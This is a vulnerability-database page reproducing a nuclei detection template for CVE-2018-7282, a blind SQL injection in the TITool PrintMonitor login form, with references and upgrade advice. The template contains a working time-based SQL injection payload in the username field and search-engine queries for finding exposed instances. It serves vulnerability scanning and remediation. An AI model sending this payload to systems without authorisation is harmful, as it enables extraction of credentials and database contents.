Lucene search
K

TITool PrintMonitor - Blind SQL Injection

🗓️ 13 Jun 2026 03:02:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 43 Views

TITool PrintMonitor - Blind SQL Injection. Upgrade to PM18.2.1

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2018-7282
21 Aug 202521:02
circl
CNVD
TI-Tool TITool PrintMonitor SQL Injection Vulnerability
9 Dec 201900:00
cnvd
CVE
CVE-2018-7282
6 Dec 201916:56
cve
Cvelist
CVE-2018-7282
6 Dec 201916:56
cvelist
NVD
CVE-2018-7282
6 Dec 201917:15
nvd
OSV
CVE-2018-7282
6 Dec 201917:15
osv
Prion
Design/Logic Flaw
6 Dec 201917:15
prion
RedhatCVE
CVE-2018-7282
22 May 202508:14
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2018-7282
19 Aug 202500:00
vulncheck_kev
id: CVE-2018-7282

info:
  name: TITool PrintMonitor - Blind SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.
  impact: |
    Unauthenticated attackers can execute time-based blind SQL injection to extract database contents, potentially compromising user credentials and sensitive printing data.
  remediation: Upgrade to PM18.2.1.
  reference:
    - https://fenceposterror.github.io/cve-2018-7282.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2018-7282
    - http://print.com
    - http://ti-tool.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-7282
    cwe-id: CWE-89
    epss-score: 0.6882
    epss-percentile: 0.98651
    cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: titool
    product: printmonitor
    shodan-query:
      - title:"PrintMonitor"
      - http.title:"printmonitor"
    fofa-query: title="printmonitor"
    google-query: intitle:"printmonitor"
    product": printmonitor
  tags: time-based-sqli,cve2018,cve,sqli,printmonitor,unauth,titool,vkev,vuln
variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"

http:
  - raw:
      - |
        @timeout: 20s
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "PrintMonitor") && contains(header, "text/html")'
        condition: and
# digest: 4a0a0047304502207c99d559872192a7904de738f3760b5e319e69ff6a60758006e19b0b4d415970022100a08ab21f3a8bed88c295fddb49a384dfcc1ad7f08624e45451c96c2a4a67f885:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.4High risk
Vulners AI Score8.4
CVSS 27.5
CVSS 3.19.8
EPSS0.6882
43